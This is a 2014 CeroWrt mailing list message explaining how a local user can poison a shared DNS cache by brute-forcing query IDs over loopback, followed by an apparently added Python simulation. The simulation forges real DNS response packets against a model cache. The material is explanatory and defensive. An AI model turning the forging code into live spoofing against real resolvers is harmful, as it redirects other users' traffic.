[Cerowrt-devel] Full blown DNSSEC by default?

Simon Kelley simon at thekelleys.org.uk
Thu Apr 17 17:01:30 EDT 2014


On 14/04/14 00:24, Dave Taht wrote:
>
> 
> So far as I know the caching functionality in dnsmasq in that instance
> is disabled due to fears about cache poisoning, that I don't fully
> understand. My half-understood fear translates into equivalent fears
> for other local dns daemons.
> 

My understanding is that this relates to multi-user systems where the
users share the cache and run on the local machine.

Essentially, if I can generate cache misses at will, i.e. by making
queries, then I can synchronously flood the DNS cache with bogus answers
to the query. Source-port randomisation doesn't help: a simple netstat
or equivalent will tell me that, so the only protection is the 16-bit
query-id, which is no protection at all: 64k UDP packets via the
loopback interface can easily arrive before one from the wider internet.

That allows a user to poison his own DNS, but if the cache is shared,
then it allows him to also poison the DNS of any other user on the machine.

The solution is per-user caches.


Simon.
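To make the race in the message above concrete, the following is an added simulation, not code from dnsmasq or the CeroWrt project. It models a shared cache with one outstanding query per randomised source port, an unprivileged local user who triggers a miss, reads the open UDP port the way netstat would, and then tries every 16-bit transaction ID against that port. The name `example.com.`, the bogus address `203.0.113.66` and the `netstat()`/`receive()` helpers are constructed for the example; the packets are real DNS wire format so the resolver-side checks are the ones a forwarder actually performs on the ID and question section.

```python
"""Simulation of a local user poisoning a shared DNS cache over loopback.

Constructed example, not code from dnsmasq or CeroWrt. The "resolver" keeps
one shared cache and one pending query per source port; the "attacker" is an
unprivileged user on the same host who can (a) cause a cache miss by asking
for a name, (b) learn the query's source port as netstat/ss would show it,
and (c) send every 16-bit transaction ID to that port over loopback.
"""
import random
import struct

# Constructed sample data: the name being poisoned and the bogus address.
TARGET_NAME = "example.com."
BOGUS_IP = "203.0.113.66"


def encode_name(name: str) -> bytes:
    """Encode a dotted name as DNS labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(pkt: bytes, off: int):
    """Decode an uncompressed name at pkt[off:]; return (name, next offset)."""
    labels = []
    while True:
        n = pkt[off]
        off += 1
        if n == 0:
            break
        labels.append(pkt[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels) + ".", off


def build_response(txid: int, qname: str, ip: str) -> bytes:
    """Forge a minimal standard response carrying one A record for qname."""
    hdr = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR|RD|RA, 1 Q, 1 A
    question = encode_name(qname) + struct.pack("!HH", 1, 1)  # type A, class IN
    # The answer's owner name is a compression pointer (0xc00c) to the question.
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4)
    rr += bytes(int(octet) for octet in ip.split("."))
    return hdr + question + rr


class SharedCache:
    """One cache shared by every user on the host; one pending query per port."""

    def __init__(self, rng=None):
        self.rng = rng or random.Random()
        self.cache = {}       # qname -> ip
        self.pending = {}     # source port -> (txid, qname)
        self.rejected = 0     # forged packets that failed the checks

    def send_query(self, qname: str) -> None:
        """Cache miss: open a randomised source port with a random 16-bit ID."""
        port = self.rng.randint(1024, 65535)
        txid = self.rng.randint(0, 65535)
        self.pending[port] = (txid, qname)

    def netstat(self):
        """What `netstat -anu` / `ss -anu` shows any local user: open UDP ports."""
        return sorted(self.pending)

    def receive(self, dst_port: int, pkt: bytes) -> bool:
        """Accept pkt only if ID and question match the query pending on dst_port."""
        if dst_port not in self.pending:
            return False                 # no socket there; the kernel would drop it
        txid, qname = self.pending[dst_port]
        rtxid, flags, qdcount, ancount, _, _ = struct.unpack_from("!HHHHHH", pkt, 0)
        ok = rtxid == txid and bool(flags & 0x8000) and qdcount == 1 and ancount >= 1
        off = 12
        if ok:
            name, off = decode_name(pkt, off)
            qtype, qclass = struct.unpack_from("!HH", pkt, off)
            off += 4
            ok = name == qname and (qtype, qclass) == (1, 1)
            ok = ok and pkt[off:off + 2] == b"\xc0\x0c"
        if ok:
            off += 2
            rtype, rclass, _ttl, rdlen = struct.unpack_from("!HHIH", pkt, off)
            off += 10
            ok = (rtype, rclass, rdlen) == (1, 1, 4)
        if not ok:
            self.rejected += 1
            return False
        self.cache[qname] = ".".join(str(b) for b in pkt[off:off + 4])
        del self.pending[dst_port]       # first matching answer wins
        return True


def run_attack(seed=None):
    """One unprivileged user poisons the shared cache; returns what happened."""
    resolver = SharedCache(random.Random(seed))
    resolver.send_query(TARGET_NAME)          # step 1: force a cache miss
    port = resolver.netstat()[0]              # step 2: source-port randomisation defeated
    attempts = 0
    for txid in range(1 << 16):               # step 3: all 64k IDs over loopback
        attempts += 1
        if resolver.receive(port, build_response(txid, TARGET_NAME, BOGUS_IP)):
            break
    return {"attempts": attempts, "rejected": resolver.rejected,
            "poisoned": resolver.cache.get(TARGET_NAME)}


if __name__ == "__main__":
    print(run_attack())
```

Running it shows the cache holding the bogus address after at most 65536 packets, with every earlier packet rejected only on the transaction ID; had the port stayed secret, the same search would span 2^16 IDs times the ephemeral port range. The simulation follows the message in treating the ID as the only remaining check. In practice resolvers also compare a reply's source address and port with the server they queried, and forging that from loopback needs raw-socket or transparent-bind privileges, which is the first thing to verify when assessing a given daemon.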